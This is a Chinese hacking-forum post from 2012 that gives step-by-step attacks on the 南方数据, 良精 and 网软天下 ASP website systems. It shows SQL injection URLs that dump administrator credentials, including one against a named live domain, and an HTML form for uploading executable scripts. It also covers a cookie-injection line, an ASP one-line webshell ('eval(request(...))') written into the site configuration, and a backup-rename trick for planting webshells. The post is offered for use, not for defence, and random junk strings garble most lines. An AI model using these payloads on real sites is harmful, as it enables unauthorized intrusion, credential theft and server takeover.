找回密码
 立即注册
查看: 3500|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb* j8 ^5 Y, u+ \/ |7 ~
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
7 ^' D( n: G, e/ n5 _( G( J) z/ l也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7. I. x/ g3 @1 Y/ @6 \5 a; d3 j
直接暴管理员帐号密码(md5)
7 A" W$ f% K$ C" ?2.登陆后台
  x/ \) g; C% E7 d* [5 [0 f3.利用编辑器上传:, W: M( d# e8 [. I' z3 S
访问admin/southidceditor/admin_style.asp7 R4 d5 L& u  m5 ~/ |. `
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.8 ]( s* P' j, E$ A; q8 c
& S! I1 p7 k# q, Q; `2 `% o4 W& d
========================================
4 W4 `" D/ \3 y" p8 R- e, ]& A/ T& D* j/ O  b' m
参考资料整理:
3 D4 o; N) f0 o5 D3 D南方数据、良精系统、网软天下漏洞利用
& I! f& v* F. f4 G, R# n
3 k+ N* L+ k' y# m* b1、通过upfile_other.asp漏洞文件直接取SHELL
) ?3 ?# I4 J& ^; ?直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
$ w$ n4 G; }# h! p4 f& c<HTML><HEAD>
6 \# N+ l) d; k. ?  A<META http-equiv=Content-Type content="text/html; charset=gb2312"> # q& d4 q, u% K: C
<STYLE type=text/css>BODY {
$ ?' a( o( E* b: b* v* k. z/ qFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 0 R6 M& L  V  C% n/ C
}
7 l6 _+ G- E! z4 M9 t4 V) G.tx1 { : m9 q& P1 [0 p
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
: a0 Y& s) l, e3 k0 M; f}
3 X$ I% Q# X3 Z2 T, `; {1 b/ x</STYLE>
- _# W7 S: O6 E& }& x0 k<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
% B) ^3 N6 Q) p0 i<BODY leftMargin=0 topMargin=0> % S! k$ U. y; B' s: B/ C
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ! I2 k% J  F( z8 ~9 p. |- {8 O
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> # X4 P6 t; O6 U4 W; C6 [
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
% K' r& S+ f4 d" d9 h0 n) }: x4 e5 M" n- q4 |# A
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。' ?) z3 f& f* [  u
注:此方法通杀南方数据、良精系统、网软天下等
* t0 b7 u& A+ l( c9 ~& }
2 r" g% X3 U0 V! p2、通过注入秒杀管理员帐号密码,使用如下:9 T6 j" W9 _" G) K( x4 N, ^$ S, U
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
' p2 k2 K( X$ C) t以上代码直接暴管理员帐号和密码,取SHELL方法如下:
& E) s4 c* b$ b, U! e在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’, K, h5 i9 ~& k: P) s) Z
成功把shell写入http://www.target.com/inc/config.asp- Z4 T7 j3 j4 N7 c! q3 R, @' p) x
这里一句话chr(32)密码是“#”
4 J6 X3 L" i/ S3 v3 c' J' @3、cookie注入. Y2 D& p5 ^1 J6 a- v
清空地址栏,利用union语句来注入,提交:' N% m- ?0 c" m
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))0 c; K7 g1 @+ q/ P% b, F
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?  _* _9 a$ u6 W9 F) K# @' P
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
  e! H; R7 `9 N1 a(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
- x, I- S% v- x9 @
# b( W0 H# P8 u. Y9 `, _三、后台取SHELL方法总结
7 W, z  C4 t2 G  r: P" @' x(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
; U5 X7 h7 Z  a2 z然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,) R( E8 A8 r7 I1 o/ n- V! R
这时再打开一句话马的客户端,提交同样得到一个小马. O( e% K3 u3 |- W  _
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
' A2 N5 X7 A8 R6 I(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:) t7 Y2 s" y0 U4 O6 {. s4 n4 v3 d& s
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
4 j( u$ @& ]' |7 ?EnableUpload=false
" e0 r+ j  Z4 F/ `/ g, _' M4 N1 S1 v' i! m# A& R4 v
end if   s6 _$ q* U$ x' V6 M9 F9 `- S4 O
if EnableUpload=false then  D3 M3 G- o% ?+ C4 v0 i3 p  g3 R
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
0 k! r% V7 @6 k) ]' DFoundErr=true4 k/ N  O, _" n, ?" D6 h
end if
% u/ q; M. \, O* N* K  L2 n8 T大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
9 Y! M$ Q( p4 a% r8 X& M6 W" b提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
2 F6 |2 L8 s" x( T) b(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的; d7 T, B6 }# n5 x/ D
! n& P8 ^- O9 c9 |' [
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的, O: p- j- u/ y7 F) G$ T  m0 C
直接访问备份后的地址,就得到一个webshell. U& G$ H: J; A, B
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表